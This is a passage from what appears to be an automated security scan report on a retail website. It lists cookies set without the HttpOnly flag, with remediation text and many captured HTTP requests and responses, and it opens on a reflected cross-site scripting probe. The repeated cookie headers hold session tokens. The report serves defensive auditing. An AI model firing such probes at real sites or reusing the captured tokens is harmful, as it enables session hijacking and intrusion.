<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Remo ...[SNIP]... <a href="http://www.google.com/search?hl=en&q=fa342"><script>alert(1)</script>8fbc8b2d053" class="backLink2"> ...[SNIP]...
2. Cookie without HttpOnly flag setpreviousnext There are 159 instances of this issue:
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /$35-$65-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:45 GMT Server: Apache Set-Cookie: JSESSIONID=3F63C3CCFE8B24F24A5C7314BF275B63; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>$ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /$65-$100-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:45 GMT Server: Apache Set-Cookie: JSESSIONID=011B1EC2529F6FF9A554AEB333DC683B; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>$ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /accessories.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:01:03 GMT Server: Apache Set-Cookie: JSESSIONID=B3B4A11105C41D4B5186CE5E37A92DC2; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>A ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /adi-designs-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:29 GMT Server: Apache Set-Cookie: JSESSIONID=A05B6D5F6AACBEF1C01C991EC72E0BA6; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>A ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /all-brands.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:00:55 GMT Server: Apache Set-Cookie: JSESSIONID=07947B58856491CA7C4E3F114293AE4F; Path=/ Edge-control: !no-store,max-age=3600 Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <h ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /all-categories.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:01:34 GMT Server: Apache Set-Cookie: JSESSIONID=AB8E3000ACEF4E1F52323517930C0C17; Path=/ Edge-control: !no-store,max-age=9600 Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> < ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /all-styles.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:04:37 GMT Server: Apache Set-Cookie: JSESSIONID=27D43EE67EB33747534AA65B18B77EFD; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>A ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /athletic-shoes.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:02:18 GMT Server: Apache Set-Cookie: JSESSIONID=BBD98DE6F116855115BA3396EE913015; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>A ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bags.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:01:03 GMT Server: Apache Set-Cookie: JSESSIONID=AD13C95CE1D832AB3DFB6AE987D78019; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>B ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /beige-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:05:21 GMT Server: Apache Set-Cookie: JSESSIONID=608571B248A024F268455B130241C498; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>B ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /belts-3x8.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:48 GMT Server: Apache Set-Cookie: JSESSIONID=F58DA6E162B01B1EAD5C4B6E18FADD83; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>B ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /belts-same-day.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:53 GMT Server: Apache Set-Cookie: JSESSIONID=BED340193E83D2D1FCBAC7A24D6465A1; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>B ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /belts-sort-by-brand-a-to-z.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:39 GMT Server: Apache Set-Cookie: JSESSIONID=E9AA3F6709F71DC443E686DA6846FC59; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>B ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /belts-sort-by-brand-z-to-a.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:39 GMT Server: Apache Set-Cookie: JSESSIONID=2785C498022ACFA67E1A317D447F2EA8; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>B ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /belts-sort-by-new.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:39 GMT Server: Apache Set-Cookie: JSESSIONID=B865137F068C824EEAE2410268396B71; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>B ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /belts-sort-by-percent-off.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:43 GMT Server: Apache Set-Cookie: JSESSIONID=F51166D1C3D2CA7D8151C07EF436862C; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>B ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /belts-sort-by-price-high-to-low.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:42 GMT Server: Apache Set-Cookie: JSESSIONID=DD697AF49C8C5750FE650D5E395E2686; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>B ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /belts-sort-by-price-low-to-high.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:41 GMT Server: Apache Set-Cookie: JSESSIONID=09A4A673152653E5427BBD981D994772; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>B ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
